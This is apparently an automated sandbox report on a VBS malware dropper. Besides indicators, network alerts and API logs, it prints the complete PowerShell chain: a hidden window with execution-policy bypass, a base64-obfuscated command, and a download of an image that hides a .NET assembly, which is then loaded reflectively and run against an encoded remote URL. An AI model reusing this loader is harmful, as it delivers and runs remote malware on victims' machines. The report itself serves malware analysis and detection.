
xlammexpoittt.vbs

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 27, 2023, 5 p.m. Oct. 27, 2023, 5:04 p.m.
Size 107.4KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 9595077ef106c2510f73d0132ea81155
SHA256 ef6fe5bef68a9e8fbcdad06c5f97d5d4a72ec0355181be42fc67b9ad4b770592
CRC32 875F0B27
ssdeep 1536:F+kdDkYHMe4Mi3mI2hb7KZ18C2NGkikGkFjGkikGkKEt0eEKU+kCKGWGPrbrbTDb:8eBQZxNj53e
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xlammexpoittt.vbs

    840
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2140
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2236

IP Address Status Action
185.196.8.176 Active Moloch
104.21.45.138 Active Moloch
104.21.84.67 Active Moloch
121.254.136.9 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49161 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.103:49167 -> 104.21.45.138:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49161 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49167
104.21.45.138:443
C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71
TLSv1
192.168.56.103:49161
104.21.84.67:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee cd:77:4c:26:1f:f8:63:15:43:5a:ba:aa:11:f1:e7:1a:23:3e:4b:15

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:177
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: bClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::UTF8
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: .GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_EN
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: D>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: mRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dad
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: sa' , 'de' , 'cu'))
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: At line:1 char:240
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: bClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetSt
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: ring <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_EN
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: D>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: mRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dad
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: sa' , 'de' , 'cu'))
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: At line:1 char:346
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: bClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetSt
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: ring($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x0000028b
1 1 0

WriteConsoleW

buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00315f08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316748
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00316888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e690
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071e710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://paste.ee/d/Hhg3l
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02650000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02840000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2140
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2140
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02841000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02842000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
